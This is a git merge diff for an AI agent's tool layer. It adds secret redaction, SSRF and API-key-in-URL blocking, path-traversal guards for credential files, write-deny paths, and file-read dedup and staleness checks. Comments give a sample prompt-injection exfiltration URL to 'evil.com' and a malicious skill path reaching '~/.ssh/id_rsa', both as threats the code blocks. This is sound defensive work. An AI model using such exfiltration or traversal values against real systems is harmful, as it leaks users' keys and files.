Merge branch 'main' into rewbs/tool-use-charge-to-subscription

2026-04-02 11:00:35 +11:00
parent 1b7473e702 bd9e0b605f
commit a2e56d044b
175 changed files with 18848 additions and 3772 deletions
--- a/tools/browser_camofox.py
+++ b/tools/browser_camofox.py
@@ -15,7 +15,7 @@ Setup::
    npm install && npm start   # downloads Camoufox (~300MB) on first run

    # Option 2: Docker
-    docker run -p 9377:9377 jo-inc/camofox-browser
+    docker run -p 9377:9377 -e CAMOFOX_PORT=9377 jo-inc/camofox-browser

 Then set ``CAMOFOX_URL=http://localhost:9377`` in ``~/.hermes/.env``.
 """
@@ -34,6 +34,9 @@ from typing import Any, Dict, Optional

 import requests

+from hermes_cli.config import load_config
+from tools.browser_camofox_state import get_camofox_identity
+
 logger = logging.getLogger(__name__)

 # ---------------------------------------------------------------------------
@@ -42,6 +45,8 @@ logger = logging.getLogger(__name__)

 _DEFAULT_TIMEOUT = 30  # seconds per HTTP request
 _SNAPSHOT_MAX_CHARS = 80_000  # camofox paginates at this limit
+_vnc_url: Optional[str] = None  # cached from /health response
+_vnc_url_checked = False  # only probe once per process


 def get_camofox_url() -> str:
@@ -56,16 +61,52 @@ def is_camofox_mode() -> bool:

 def check_camofox_available() -> bool:
    """Verify the Camofox server is reachable."""
+    global _vnc_url, _vnc_url_checked
    url = get_camofox_url()
    if not url:
        return False
    try:
        resp = requests.get(f"{url}/health", timeout=5)
+        if resp.status_code == 200 and not _vnc_url_checked:
+            try:
+                data = resp.json()
+                vnc_port = data.get("vncPort")
+                if isinstance(vnc_port, int) and 1 <= vnc_port <= 65535:
+                    from urllib.parse import urlparse
+                    parsed = urlparse(url)
+                    host = parsed.hostname or "localhost"
+                    _vnc_url = f"http://{host}:{vnc_port}"
+            except (ValueError, KeyError):
+                pass
+            _vnc_url_checked = True
        return resp.status_code == 200
    except Exception:
        return False


+def get_vnc_url() -> Optional[str]:
+    """Return the VNC URL if the Camofox server exposes one, or None."""
+    if not _vnc_url_checked:
+        check_camofox_available()
+    return _vnc_url
+
+
+def _managed_persistence_enabled() -> bool:
+    """Return whether Hermes-managed persistence is enabled for Camofox.
+
+    When enabled, sessions use a stable profile-scoped userId so the
+    Camofox server can map it to a persistent browser profile directory.
+    When disabled (default), each session gets a random userId (ephemeral).
+
+    Controlled by ``browser.camofox.managed_persistence`` in config.yaml.
+    """
+    try:
+        camofox_cfg = load_config().get("browser", {}).get("camofox", {})
+    except Exception:
+        return False
+    return bool(camofox_cfg.get("managed_persistence"))
+
+
 # ---------------------------------------------------------------------------
 # Session management
 # ---------------------------------------------------------------------------
@@ -75,16 +116,31 @@ _sessions_lock = threading.Lock()


 def _get_session(task_id: Optional[str]) -> Dict[str, Any]:
-    """Get or create a camofox session for the given task."""
+    """Get or create a camofox session for the given task.
+
+    When managed persistence is enabled, uses a deterministic userId
+    derived from the Hermes profile so the Camofox server can map it
+    to the same persistent browser profile across restarts.
+    """
    task_id = task_id or "default"
    with _sessions_lock:
        if task_id in _sessions:
            return _sessions[task_id]
-        session = {
-            "user_id": f"hermes_{uuid.uuid4().hex[:10]}",
-            "tab_id": None,
-            "session_key": f"task_{task_id[:16]}",
-        }
+        if _managed_persistence_enabled():
+            identity = get_camofox_identity(task_id)
+            session = {
+                "user_id": identity["user_id"],
+                "tab_id": None,
+                "session_key": identity["session_key"],
+                "managed": True,
+            }
+        else:
+            session = {
+                "user_id": f"hermes_{uuid.uuid4().hex[:10]}",
+                "tab_id": None,
+                "session_key": f"task_{task_id[:16]}",
+                "managed": False,
+            }
        _sessions[task_id] = session
        return session

@@ -172,11 +228,19 @@ def camofox_navigate(url: str, task_id: Optional[str] = None) -> str:
                {"userId": session["user_id"], "url": url},
                timeout=60,
            )
-        return json.dumps({
+        result = {
            "success": True,
            "url": data.get("url", url),
            "title": data.get("title", ""),
-        })
+        }
+        vnc = get_vnc_url()
+        if vnc:
+            result["vnc_url"] = vnc
+            result["vnc_hint"] = (
+                "Browser is visible via VNC. "
+                "Share this link with the user so they can watch the browser live."
+            )
+        return json.dumps(result)
    except requests.HTTPError as e:
        return json.dumps({"success": False, "error": f"Navigation failed: {e}"})
    except requests.ConnectionError:
@@ -184,7 +248,7 @@ def camofox_navigate(url: str, task_id: Optional[str] = None) -> str:
            "success": False,
            "error": f"Cannot connect to Camofox at {get_camofox_url()}. "
                     "Is the server running? Start with: npm start (in camofox-browser dir) "
-                     "or: docker run -p 9377:9377 jo-inc/camofox-browser",
+                     "or: docker run -p 9377:9377 -e CAMOFOX_PORT=9377 jo-inc/camofox-browser",
        })
    except Exception as e:
        return json.dumps({"success": False, "error": str(e)})
@@ -421,6 +485,12 @@ def camofox_vision(question: str, annotate: bool = False,
            except Exception:
                pass

+        # Redact secrets from annotation context before sending to vision LLM.
+        # The screenshot image itself cannot be redacted, but at least the
+        # text-based accessibility tree snippet won't leak secret values.
+        from agent.redact import redact_sensitive_text
+        annotation_context = redact_sensitive_text(annotation_context)
+
        # Send to vision LLM
        from agent.auxiliary_client import call_llm

@@ -436,7 +506,7 @@ def camofox_vision(question: str, annotate: bool = False,
        except Exception:
            _vision_timeout = 120

-        analysis = call_llm(
+        response = call_llm(
            messages=[{
                "role": "user",
                "content": [
@@ -452,6 +522,11 @@ def camofox_vision(question: str, annotate: bool = False,
            task="vision",
            timeout=_vision_timeout,
        )
+        analysis = (response.choices[0].message.content or "").strip() if response.choices else ""
+
+        # Redact secrets the vision LLM may have read from the screenshot.
+        from agent.redact import redact_sensitive_text
+        analysis = redact_sensitive_text(analysis)

        return json.dumps({
            "success": True,
--- a/tools/browser_camofox_state.py
+++ b/tools/browser_camofox_state.py
@@ -0,0 +1,47 @@
+"""Hermes-managed Camofox state helpers.
+
+Provides profile-scoped identity and state directory paths for Camofox
+persistent browser profiles.  When managed persistence is enabled, Hermes
+sends a deterministic userId derived from the active profile so that
+Camofox can map it to the same persistent browser profile directory
+across restarts.
+"""
+
+from __future__ import annotations
+
+import uuid
+from pathlib import Path
+from typing import Dict, Optional
+
+from hermes_constants import get_hermes_home
+
+CAMOFOX_STATE_DIR_NAME = "browser_auth"
+CAMOFOX_STATE_SUBDIR = "camofox"
+
+
+def get_camofox_state_dir() -> Path:
+    """Return the profile-scoped root directory for Camofox persistence."""
+    return get_hermes_home() / CAMOFOX_STATE_DIR_NAME / CAMOFOX_STATE_SUBDIR
+
+
+def get_camofox_identity(task_id: Optional[str] = None) -> Dict[str, str]:
+    """Return the stable Hermes-managed Camofox identity for this profile.
+
+    The user identity is profile-scoped (same Hermes profile = same userId).
+    The session key is scoped to the logical browser task so newly created
+    tabs within the same profile reuse the same identity contract.
+    """
+    scope_root = str(get_camofox_state_dir())
+    logical_scope = task_id or "default"
+    user_digest = uuid.uuid5(
+        uuid.NAMESPACE_URL,
+        f"camofox-user:{scope_root}",
+    ).hex[:10]
+    session_digest = uuid.uuid5(
+        uuid.NAMESPACE_URL,
+        f"camofox-session:{scope_root}:{logical_scope}",
+    ).hex[:16]
+    return {
+        "user_id": f"hermes_{user_digest}",
+        "session_key": f"task_{session_digest}",
+    }
--- a/tools/browser_tool.py
+++ b/tools/browser_tool.py
@@ -238,6 +238,8 @@ _PROVIDER_REGISTRY: Dict[str, type] = {

 _cached_cloud_provider: Optional[CloudBrowserProvider] = None
 _cloud_provider_resolved = False
+_allow_private_urls_resolved = False
+_cached_allow_private_urls: Optional[bool] = None


 def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
@@ -299,6 +301,44 @@ def _is_local_mode() -> bool:
    return _get_cloud_provider() is None


+def _is_local_backend() -> bool:
+    """Return True when the browser runs locally (no cloud provider).
+
+    SSRF protection is only meaningful for cloud backends (Browserbase,
+    BrowserUse) where the agent could reach internal resources on a remote
+    machine.  For local backends — Camofox, or the built-in headless
+    Chromium without a cloud provider — the user already has full terminal
+    and network access on the same machine, so the check adds no security
+    value.
+    """
+    return _is_camofox_mode() or _get_cloud_provider() is None
+
+
+def _allow_private_urls() -> bool:
+    """Return whether the browser is allowed to navigate to private/internal addresses.
+
+    Reads ``config["browser"]["allow_private_urls"]`` once and caches the result
+    for the process lifetime.  Defaults to ``False`` (SSRF protection active).
+    """
+    global _cached_allow_private_urls, _allow_private_urls_resolved
+    if _allow_private_urls_resolved:
+        return _cached_allow_private_urls
+
+    _allow_private_urls_resolved = True
+    _cached_allow_private_urls = False  # safe default
+    try:
+        hermes_home = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes"))
+        config_path = hermes_home / "config.yaml"
+        if config_path.exists():
+            import yaml
+            with open(config_path) as f:
+                cfg = yaml.safe_load(f) or {}
+            _cached_allow_private_urls = bool(cfg.get("browser", {}).get("allow_private_urls"))
+    except Exception as e:
+        logger.debug("Could not read allow_private_urls from config: %s", e)
+    return _cached_allow_private_urls
+
+
 def _socket_safe_tmpdir() -> str:
    """Return a short temp directory path suitable for Unix domain sockets.

@@ -1024,6 +1064,13 @@ def _extract_relevant_content(
            f"Provide a concise summary focused on interactive elements and key content."
        )

+    # Redact secrets from snapshot before sending to auxiliary LLM.
+    # Without this, a page displaying env vars or API keys would leak
+    # secrets to the extraction model before run_agent.py's general
+    # redaction layer ever sees the tool result.
+    from agent.redact import redact_sensitive_text
+    extraction_prompt = redact_sensitive_text(extraction_prompt)
+
    try:
        call_kwargs = {
            "task": "web_extract",
@@ -1035,7 +1082,9 @@ def _extract_relevant_content(
        if model:
            call_kwargs["model"] = model
        response = call_llm(**call_kwargs)
-        return (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
+        extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
+        # Redact any secrets the auxiliary LLM may have echoed back.
+        return redact_sensitive_text(extracted)
    except Exception:
        return _truncate_snapshot(snapshot_text)

@@ -1072,8 +1121,23 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
    Returns:
        JSON string with navigation result (includes stealth features info on first nav)
    """
-    # SSRF protection — block private/internal addresses before navigating
-    if not _is_safe_url(url):
+    # Secret exfiltration protection — block URLs that embed API keys or
+    # tokens in query parameters. A prompt injection could trick the agent
+    # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
+    from agent.redact import _PREFIX_RE
+    if _PREFIX_RE.search(url):
+        return json.dumps({
+            "success": False,
+            "error": "Blocked: URL contains what appears to be an API key or token. "
+                     "Secrets must not be sent in URLs.",
+        })
+
+    # SSRF protection — block private/internal addresses before navigating.
+    # Skipped for local backends (Camofox, headless Chromium without a cloud
+    # provider) because the agent already has full local network access via
+    # the terminal tool.  Can also be opted out for cloud mode via
+    # ``browser.allow_private_urls`` in config.
+    if not _is_local_backend() and not _allow_private_urls() and not _is_safe_url(url):
        return json.dumps({
            "success": False,
            "error": "Blocked: URL targets a private or internal address",
@@ -1115,7 +1179,8 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
        # Post-redirect SSRF check — if the browser followed a redirect to a
        # private/internal address, block the result so the model can't read
        # internal content via subsequent browser_snapshot calls.
-        if final_url and final_url != url and not _is_safe_url(final_url):
+        # Skipped for local backends (same rationale as the pre-nav check).
+        if not _is_local_backend() and not _allow_private_urls() and final_url and final_url != url and not _is_safe_url(final_url):
            # Navigate away to a blank page to prevent snapshot leaks
            _run_browser_command(effective_task_id, "open", ["about:blank"], timeout=10)
            return json.dumps({
@@ -1711,6 +1776,9 @@ def browser_vision(question: str, annotate: bool = False, task_id: Optional[str]
        response = call_llm(**call_kwargs)
        
        analysis = (response.choices[0].message.content or "").strip()
+        # Redact secrets the vision LLM may have read from the screenshot.
+        from agent.redact import redact_sensitive_text
+        analysis = redact_sensitive_text(analysis)
        response_data = {
            "success": True,
            "analysis": analysis or "Vision analysis returned no content.",
--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -596,6 +596,14 @@ def execute_code(
        stdout_text = strip_ansi(stdout_text)
        stderr_text = strip_ansi(stderr_text)

+        # Redact secrets (API keys, tokens, etc.) from sandbox output.
+        # The sandbox env-var filter (lines 434-454) blocks os.environ access,
+        # but scripts can still read secrets from disk (e.g. open('~/.hermes/.env')).
+        # This ensures leaked secrets never enter the model context.
+        from agent.redact import redact_sensitive_text
+        stdout_text = redact_sensitive_text(stdout_text)
+        stderr_text = redact_sensitive_text(stderr_text)
+
        # Build response
        result: Dict[str, Any] = {
            "status": status,
--- a/tools/credential_files.py
+++ b/tools/credential_files.py
@@ -55,16 +55,47 @@ def register_credential_file(

    *relative_path* is relative to ``HERMES_HOME`` (e.g. ``google_token.json``).
    Returns True if the file exists on the host and was registered.
+
+    Security: rejects absolute paths and path traversal sequences (``..``).
+    The resolved host path must remain inside HERMES_HOME so that a malicious
+    skill cannot declare ``required_credential_files: ['../../.ssh/id_rsa']``
+    and exfiltrate sensitive host files into a container sandbox.
    """
    hermes_home = _resolve_hermes_home()
+
+    # Reject absolute paths — they bypass the HERMES_HOME sandbox entirely.
+    if os.path.isabs(relative_path):
+        logger.warning(
+            "credential_files: rejected absolute path %r (must be relative to HERMES_HOME)",
+            relative_path,
+        )
+        return False
+
    host_path = hermes_home / relative_path
-    if not host_path.is_file():
-        logger.debug("credential_files: skipping %s (not found)", host_path)
+
+    # Resolve symlinks and normalise ``..`` before the containment check so
+    # that traversal like ``../. ssh/id_rsa`` cannot escape HERMES_HOME.
+    try:
+        resolved = host_path.resolve()
+        hermes_home_resolved = hermes_home.resolve()
+        resolved.relative_to(hermes_home_resolved)  # raises ValueError if outside
+    except ValueError:
+        logger.warning(
+            "credential_files: rejected path traversal %r "
+            "(resolves to %s, outside HERMES_HOME %s)",
+            relative_path,
+            resolved,
+            hermes_home_resolved,
+        )
+        return False
+
+    if not resolved.is_file():
+        logger.debug("credential_files: skipping %s (not found)", resolved)
        return False

    container_path = f"{container_base.rstrip('/')}/{relative_path}"
-    _registered_files[container_path] = str(host_path)
-    logger.debug("credential_files: registered %s -> %s", host_path, container_path)
+    _registered_files[container_path] = str(resolved)
+    logger.debug("credential_files: registered %s -> %s", resolved, container_path)
    return True


@@ -110,11 +141,27 @@ def _load_config_files() -> List[Dict[str, str]]:
                cfg = yaml.safe_load(f) or {}
            cred_files = cfg.get("terminal", {}).get("credential_files")
            if isinstance(cred_files, list):
+                hermes_home_resolved = hermes_home.resolve()
                for item in cred_files:
                    if isinstance(item, str) and item.strip():
-                        host_path = hermes_home / item.strip()
+                        rel = item.strip()
+                        if os.path.isabs(rel):
+                            logger.warning(
+                                "credential_files: rejected absolute config path %r", rel,
+                            )
+                            continue
+                        host_path = (hermes_home / rel).resolve()
+                        try:
+                            host_path.relative_to(hermes_home_resolved)
+                        except ValueError:
+                            logger.warning(
+                                "credential_files: rejected config path traversal %r "
+                                "(resolves to %s, outside HERMES_HOME %s)",
+                                rel, host_path, hermes_home_resolved,
+                            )
+                            continue
                        if host_path.is_file():
-                            container_path = f"/root/.hermes/{item.strip()}"
+                            container_path = f"/root/.hermes/{rel}"
                            result.append({
                                "host_path": str(host_path),
                                "container_path": container_path,
--- a/tools/file_operations.py
+++ b/tools/file_operations.py
@@ -71,6 +71,9 @@ WRITE_DENIED_PREFIXES = [
        os.path.join(_HOME, ".kube"),
        "/etc/sudoers.d",
        "/etc/systemd",
+        os.path.join(_HOME, ".docker"),
+        os.path.join(_HOME, ".azure"),
+        os.path.join(_HOME, ".config", "gh"),
    ]
 ]

--- a/tools/file_tools.py
+++ b/tools/file_tools.py
@@ -15,6 +15,80 @@ logger = logging.getLogger(__name__)

 _EXPECTED_WRITE_ERRNOS = {errno.EACCES, errno.EPERM, errno.EROFS}

+# ---------------------------------------------------------------------------
+# Read-size guard: cap the character count returned to the model.
+# We're model-agnostic so we can't count tokens; characters are a safe proxy.
+# 100K chars ≈ 25–35K tokens across typical tokenisers.  Files larger than
+# this in a single read are a context-window hazard — the model should use
+# offset+limit to read the relevant section.
+#
+# Configurable via config.yaml:  file_read_max_chars: 200000
+# ---------------------------------------------------------------------------
+_DEFAULT_MAX_READ_CHARS = 100_000
+_max_read_chars_cached: int | None = None
+
+
+def _get_max_read_chars() -> int:
+    """Return the configured max characters per file read.
+
+    Reads ``file_read_max_chars`` from config.yaml on first call, caches
+    the result for the lifetime of the process.  Falls back to the
+    built-in default if the config is missing or invalid.
+    """
+    global _max_read_chars_cached
+    if _max_read_chars_cached is not None:
+        return _max_read_chars_cached
+    try:
+        from hermes_cli.config import load_config
+        cfg = load_config()
+        val = cfg.get("file_read_max_chars")
+        if isinstance(val, (int, float)) and val > 0:
+            _max_read_chars_cached = int(val)
+            return _max_read_chars_cached
+    except Exception:
+        pass
+    _max_read_chars_cached = _DEFAULT_MAX_READ_CHARS
+    return _max_read_chars_cached
+
+# If the total file size exceeds this AND the caller didn't specify a narrow
+# range (limit <= 200), we include a hint encouraging targeted reads.
+_LARGE_FILE_HINT_BYTES = 512_000  # 512 KB
+
+# ---------------------------------------------------------------------------
+# Device path blocklist — reading these hangs the process (infinite output
+# or blocking on input).  Checked by path only (no I/O).
+# ---------------------------------------------------------------------------
+_BLOCKED_DEVICE_PATHS = frozenset({
+    # Infinite output — never reach EOF
+    "/dev/zero", "/dev/random", "/dev/urandom", "/dev/full",
+    # Blocks waiting for input
+    "/dev/stdin", "/dev/tty", "/dev/console",
+    # Nonsensical to read
+    "/dev/stdout", "/dev/stderr",
+    # fd aliases
+    "/dev/fd/0", "/dev/fd/1", "/dev/fd/2",
+})
+
+
+def _is_blocked_device(filepath: str) -> bool:
+    """Return True if the path would hang the process (infinite output or blocking input).
+
+    Uses the *literal* path — no symlink resolution — because the model
+    specifies paths directly and realpath follows symlinks all the way
+    through (e.g. /dev/stdin → /proc/self/fd/0 → /dev/pts/0), defeating
+    the check.
+    """
+    normalized = os.path.expanduser(filepath)
+    if normalized in _BLOCKED_DEVICE_PATHS:
+        return True
+    # /proc/self/fd/0-2 and /proc/<pid>/fd/0-2 are Linux aliases for stdio
+    if normalized.startswith("/proc/") and normalized.endswith(
+        ("/fd/0", "/fd/1", "/fd/2")
+    ):
+        return True
+    return False
+
+
 # Paths that file tools should refuse to write to without going through the
 # terminal tool's approval system.  These match prefixes after os.path.realpath.
 _SENSITIVE_PATH_PREFIXES = ("/etc/", "/boot/", "/usr/lib/systemd/")
@@ -53,11 +127,21 @@ def _is_expected_write_exception(exc: Exception) -> bool:
 _file_ops_lock = threading.Lock()
 _file_ops_cache: dict = {}

-# Track files read per task to detect re-read loops after context compression.
+# Track files read per task to detect re-read loops and deduplicate reads.
 # Per task_id we store:
 #   "last_key":     the key of the most recent read/search call (or None)
 #   "consecutive":  how many times that exact call has been repeated in a row
 #   "read_history": set of (path, offset, limit) tuples for get_read_files_summary
+#   "dedup":        dict mapping (resolved_path, offset, limit) → mtime float
+#                   Used to skip re-reads of unchanged files.  Reset on
+#                   context compression (the original content is summarised
+#                   away so the model needs the full content again).
+#   "read_timestamps": dict mapping resolved_path → modification-time float
+#                      recorded when the file was last read (or written) by
+#                      this task.  Used by write_file and patch to detect
+#                      external changes between the agent's read and write.
+#                      Updated after successful writes so consecutive edits
+#                      by the same task don't trigger false warnings.
 _read_tracker_lock = threading.Lock()
 _read_tracker: dict = {}

@@ -195,8 +279,19 @@ def clear_file_ops_cache(task_id: str = None):
 def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str = "default") -> str:
    """Read a file with pagination and line numbers."""
    try:
-        # Security: block direct reads of internal Hermes cache/index files
-        # to prevent prompt injection via catalog or hub metadata files.
+        # ── Device path guard ─────────────────────────────────────────
+        # Block paths that would hang the process (infinite output,
+        # blocking on input).  Pure path check — no I/O.
+        if _is_blocked_device(path):
+            return json.dumps({
+                "error": (
+                    f"Cannot read '{path}': this is a device file that would "
+                    "block or produce infinite output."
+                ),
+            })
+
+        # ── Hermes internal path guard ────────────────────────────────
+        # Prevent prompt injection via catalog or hub metadata files.
        import pathlib as _pathlib
        from hermes_constants import get_hermes_home as _get_hh
        _resolved = _pathlib.Path(path).expanduser().resolve()
@@ -217,20 +312,83 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
                })
            except ValueError:
                pass
+
+        # ── Dedup check ───────────────────────────────────────────────
+        # If we already read this exact (path, offset, limit) and the
+        # file hasn't been modified since, return a lightweight stub
+        # instead of re-sending the same content.  Saves context tokens.
+        resolved_str = str(_resolved)
+        dedup_key = (resolved_str, offset, limit)
+        with _read_tracker_lock:
+            task_data = _read_tracker.setdefault(task_id, {
+                "last_key": None, "consecutive": 0,
+                "read_history": set(), "dedup": {},
+            })
+            cached_mtime = task_data.get("dedup", {}).get(dedup_key)
+
+        if cached_mtime is not None:
+            try:
+                current_mtime = os.path.getmtime(resolved_str)
+                if current_mtime == cached_mtime:
+                    return json.dumps({
+                        "content": (
+                            "File unchanged since last read. The content from "
+                            "the earlier read_file result in this conversation is "
+                            "still current — refer to that instead of re-reading."
+                        ),
+                        "path": path,
+                        "dedup": True,
+                    }, ensure_ascii=False)
+            except OSError:
+                pass  # stat failed — fall through to full read
+
+        # ── Perform the read ──────────────────────────────────────────
        file_ops = _get_file_ops(task_id)
        result = file_ops.read_file(path, offset, limit)
        if result.content:
            result.content = redact_sensitive_text(result.content)
        result_dict = result.to_dict()

-        # Track reads to detect *consecutive* re-read loops.
-        # The counter resets whenever any other tool is called in between,
-        # so only truly back-to-back identical reads trigger warnings/blocks.
+        # ── Character-count guard ─────────────────────────────────────
+        # We're model-agnostic so we can't count tokens; characters are
+        # the best proxy we have.  If the read produced an unreasonable
+        # amount of content, reject it and tell the model to narrow down.
+        # Note: we check the formatted content (with line-number prefixes),
+        # not the raw file size, because that's what actually enters context.
+        content_len = len(result.content or "")
+        file_size = result_dict.get("file_size", 0)
+        max_chars = _get_max_read_chars()
+        if content_len > max_chars:
+            total_lines = result_dict.get("total_lines", "unknown")
+            return json.dumps({
+                "error": (
+                    f"Read produced {content_len:,} characters which exceeds "
+                    f"the safety limit ({max_chars:,} chars). "
+                    "Use offset and limit to read a smaller range. "
+                    f"The file has {total_lines} lines total."
+                ),
+                "path": path,
+                "total_lines": total_lines,
+                "file_size": file_size,
+            }, ensure_ascii=False)
+
+        # Large-file hint: if the file is big and the caller didn't ask
+        # for a narrow window, nudge toward targeted reads.
+        if (file_size and file_size > _LARGE_FILE_HINT_BYTES
+                and limit > 200
+                and result_dict.get("truncated")):
+            result_dict.setdefault("_hint", (
+                f"This file is large ({file_size:,} bytes). "
+                "Consider reading only the section you need with offset and limit "
+                "to keep context usage efficient."
+            ))
+
+        # ── Track for consecutive-loop detection ──────────────────────
        read_key = ("read", path, offset, limit)
        with _read_tracker_lock:
-            task_data = _read_tracker.setdefault(task_id, {
-                "last_key": None, "consecutive": 0, "read_history": set(),
-            })
+            # Ensure "dedup" key exists (backward compat with old tracker state)
+            if "dedup" not in task_data:
+                task_data["dedup"] = {}
            task_data["read_history"].add((path, offset, limit))
            if task_data["last_key"] == read_key:
                task_data["consecutive"] += 1
@@ -239,6 +397,17 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
                task_data["consecutive"] = 1
            count = task_data["consecutive"]

+            # Store mtime at read time for two purposes:
+            # 1. Dedup: skip identical re-reads of unchanged files.
+            # 2. Staleness: warn on write/patch if the file changed since
+            #    the agent last read it (external edit, concurrent agent, etc.).
+            try:
+                _mtime_now = os.path.getmtime(resolved_str)
+                task_data["dedup"][dedup_key] = _mtime_now
+                task_data.setdefault("read_timestamps", {})[resolved_str] = _mtime_now
+            except OSError:
+                pass  # Can't stat — skip tracking for this entry
+
        if count >= 4:
            # Hard block: stop returning content to break the loop
            return json.dumps({
@@ -296,6 +465,28 @@ def clear_read_tracker(task_id: str = None):
            _read_tracker.clear()


+def reset_file_dedup(task_id: str = None):
+    """Clear the deduplication cache for file reads.
+
+    Called after context compression — the original read content has been
+    summarised away, so the model needs the full content if it reads the
+    same file again.  Without this, reads after compression would return
+    a "file unchanged" stub pointing at content that no longer exists in
+    context.
+
+    Call with a task_id to clear just that task, or without to clear all.
+    """
+    with _read_tracker_lock:
+        if task_id:
+            task_data = _read_tracker.get(task_id)
+            if task_data and "dedup" in task_data:
+                task_data["dedup"].clear()
+        else:
+            for task_data in _read_tracker.values():
+                if "dedup" in task_data:
+                    task_data["dedup"].clear()
+
+
 def notify_other_tool_call(task_id: str = "default"):
    """Reset consecutive read/search counter for a task.

@@ -312,15 +503,71 @@ def notify_other_tool_call(task_id: str = "default"):
            task_data["consecutive"] = 0


+def _update_read_timestamp(filepath: str, task_id: str) -> None:
+    """Record the file's current modification time after a successful write.
+
+    Called after write_file and patch so that consecutive edits by the
+    same task don't trigger false staleness warnings — each write
+    refreshes the stored timestamp to match the file's new state.
+    """
+    try:
+        resolved = str(Path(filepath).expanduser().resolve())
+        current_mtime = os.path.getmtime(resolved)
+    except (OSError, ValueError):
+        return
+    with _read_tracker_lock:
+        task_data = _read_tracker.get(task_id)
+        if task_data is not None:
+            task_data.setdefault("read_timestamps", {})[resolved] = current_mtime
+
+
+def _check_file_staleness(filepath: str, task_id: str) -> str | None:
+    """Check whether a file was modified since the agent last read it.
+
+    Returns a warning string if the file is stale (mtime changed since
+    the last read_file call for this task), or None if the file is fresh
+    or was never read.  Does not block — the write still proceeds.
+    """
+    try:
+        resolved = str(Path(filepath).expanduser().resolve())
+    except (OSError, ValueError):
+        return None
+    with _read_tracker_lock:
+        task_data = _read_tracker.get(task_id)
+        if not task_data:
+            return None
+        read_mtime = task_data.get("read_timestamps", {}).get(resolved)
+    if read_mtime is None:
+        return None  # File was never read — nothing to compare against
+    try:
+        current_mtime = os.path.getmtime(resolved)
+    except OSError:
+        return None  # Can't stat — file may have been deleted, let write handle it
+    if current_mtime != read_mtime:
+        return (
+            f"Warning: {filepath} was modified since you last read it "
+            "(external edit or concurrent agent). The content you read may be "
+            "stale. Consider re-reading the file to verify before writing."
+        )
+    return None
+
+
 def write_file_tool(path: str, content: str, task_id: str = "default") -> str:
    """Write content to a file."""
    sensitive_err = _check_sensitive_path(path)
    if sensitive_err:
        return json.dumps({"error": sensitive_err}, ensure_ascii=False)
    try:
+        stale_warning = _check_file_staleness(path, task_id)
        file_ops = _get_file_ops(task_id)
        result = file_ops.write_file(path, content)
-        return json.dumps(result.to_dict(), ensure_ascii=False)
+        result_dict = result.to_dict()
+        if stale_warning:
+            result_dict["_warning"] = stale_warning
+        # Refresh the stored timestamp so consecutive writes by this
+        # task don't trigger false staleness warnings.
+        _update_read_timestamp(path, task_id)
+        return json.dumps(result_dict, ensure_ascii=False)
    except Exception as e:
        if _is_expected_write_exception(e):
            logger.debug("write_file expected denial: %s: %s", type(e).__name__, e)
@@ -346,6 +593,13 @@ def patch_tool(mode: str = "replace", path: str = None, old_string: str = None,
        if sensitive_err:
            return json.dumps({"error": sensitive_err}, ensure_ascii=False)
    try:
+        # Check staleness for all files this patch will touch.
+        stale_warnings = []
+        for _p in _paths_to_check:
+            _sw = _check_file_staleness(_p, task_id)
+            if _sw:
+                stale_warnings.append(_sw)
+
        file_ops = _get_file_ops(task_id)
        
        if mode == "replace":
@@ -362,6 +616,13 @@ def patch_tool(mode: str = "replace", path: str = None, old_string: str = None,
            return json.dumps({"error": f"Unknown mode: {mode}"})
        
        result_dict = result.to_dict()
+        if stale_warnings:
+            result_dict["_warning"] = stale_warnings[0] if len(stale_warnings) == 1 else " | ".join(stale_warnings)
+        # Refresh stored timestamps for all successfully-patched paths so
+        # consecutive edits by this task don't trigger false warnings.
+        if not result_dict.get("error"):
+            for _p in _paths_to_check:
+                _update_read_timestamp(_p, task_id)
        result_json = json.dumps(result_dict, ensure_ascii=False)
        # Hint when old_string not found — saves iterations where the agent
        # retries with stale content instead of re-reading the file.
@@ -466,7 +727,7 @@ def _check_file_reqs():

 READ_FILE_SCHEMA = {
    "name": "read_file",
-    "description": "Read a text file with line numbers and pagination. Use this instead of cat/head/tail in terminal. Output format: 'LINE_NUM|CONTENT'. Suggests similar filenames if not found. Use offset and limit for large files. NOTE: Cannot read images or binary files — use vision_analyze for images.",
+    "description": "Read a text file with line numbers and pagination. Use this instead of cat/head/tail in terminal. Output format: 'LINE_NUM|CONTENT'. Suggests similar filenames if not found. Use offset and limit for large files. Reads exceeding ~100K characters are rejected; use offset and limit to read specific sections of large files. NOTE: Cannot read images or binary files — use vision_analyze for images.",
    "parameters": {
        "type": "object",
        "properties": {
--- a/tools/skill_manager_tool.py
+++ b/tools/skill_manager_tool.py
@@ -82,6 +82,8 @@ SKILLS_DIR = HERMES_HOME / "skills"

 MAX_NAME_LENGTH = 64
 MAX_DESCRIPTION_LENGTH = 1024
+MAX_SKILL_CONTENT_CHARS = 100_000   # ~36k tokens at 2.75 chars/token
+MAX_SKILL_FILE_BYTES = 1_048_576    # 1 MiB per supporting file

 # Characters allowed in skill names (filesystem-safe, URL-friendly)
 VALID_NAME_RE = re.compile(r'^[a-z0-9][a-z0-9._-]*$')
@@ -177,6 +179,21 @@ def _validate_frontmatter(content: str) -> Optional[str]:
    return None


+def _validate_content_size(content: str, label: str = "SKILL.md") -> Optional[str]:
+    """Check that content doesn't exceed the character limit for agent writes.
+
+    Returns an error message or None if within bounds.
+    """
+    if len(content) > MAX_SKILL_CONTENT_CHARS:
+        return (
+            f"{label} content is {len(content):,} characters "
+            f"(limit: {MAX_SKILL_CONTENT_CHARS:,}). "
+            f"Consider splitting into a smaller SKILL.md with supporting files "
+            f"in references/ or templates/."
+        )
+    return None
+
+
 def _resolve_skill_dir(name: str, category: str = None) -> Path:
    """Build the directory path for a new skill, optionally under a category."""
    if category:
@@ -275,6 +292,10 @@ def _create_skill(name: str, content: str, category: str = None) -> Dict[str, An
    if err:
        return {"success": False, "error": err}

+    err = _validate_content_size(content)
+    if err:
+        return {"success": False, "error": err}
+
